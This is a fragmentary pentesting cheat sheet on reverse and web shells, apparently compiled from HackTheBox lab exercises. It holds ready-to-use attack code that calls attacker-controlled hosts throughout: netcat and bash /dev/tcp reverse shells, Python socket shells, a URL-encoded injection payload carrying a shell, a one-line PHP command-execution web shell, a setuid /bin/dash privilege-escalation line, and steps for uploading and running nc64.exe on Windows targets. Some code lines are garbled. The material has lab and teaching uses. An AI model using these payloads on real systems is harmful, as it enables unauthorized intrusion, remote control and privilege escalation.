Shells
Broad Topic
Links
Basics
Host: Setup the listener to catch the reverse shell
nc -nvlp 1234
Target: Upload your reverse shell, navigate, execute, connect
Example: BashedHTB sends a php reverse shell with wget
Easy Test Connect
nc -e /bin/bash $IP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1
nc -nlvp 4444PHP web shell
Upload this simple 'shell.php', and call it using parameter 'cmd=uname'
Consider, you might need to send 'shell.php3' to avoid the block/filter.
REF: PhpTricks, FtpHttpVuln
<?php
system($_GET["cmd"]);
?>
Execute:
http://abc.so/upload/shell.php?cmd=uname -aPython
#!/usr/bin/env python
import os
import sys
try:
#os.system('/usr/bin/touch /tmp/hello') ...test
#os.system('bash -i /dev/tcp/$MyIP/4444 0>&1') ...reverse shell
os.system('chmod 4755 /bin/dash') ...rootbash
except:
sys.exit()This worked for htb-bashed:
Root process auto-executes python scripts:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);Script:
http://10.10.10.168:8080/
import socket,subprocess,os bs;
socket.socket(socket.AF_INET,socket.SOCK_STREAM);
ns.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")#
HTTP/1.1
Bash Script/Shell (privesc)
#!/usr/bin/python
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
By Burp
Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#
Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1Browser
http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
--Remember to include the HTTP/1.1Bash Reverse
REF: ApacheJamesEmail
bash -i >& /dev/tcp/192.168.1.26/53 0>&1
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'Powershell Reverse
netcat
Create a python reverse shell
Listener #1: Share rshell with <
Listener #2: Wait for incoming
LFI: Execute nc to pickup rshell and execute it
rce > nc > python > nc/rshell
Python Reverse Shell
vim cmd ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd ..send/share the file
nc -nvlp 1234 ..catch shell
..queues;nc+10.10.10.6+9001|python+& ..fail
..queues;nc+10.10.10.6+9001|python ..ok pull file, python execute
connected!Windows netcat
Windows Target might not have netcat
Download and send the nc64.exe (assuming they are using 64bit)
Ex: DrupalPhpVuln
Download 64-bit netcat
nc64.exe: upload and execute
http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081
nc -nvlp 8081Last updated
Was this helpful?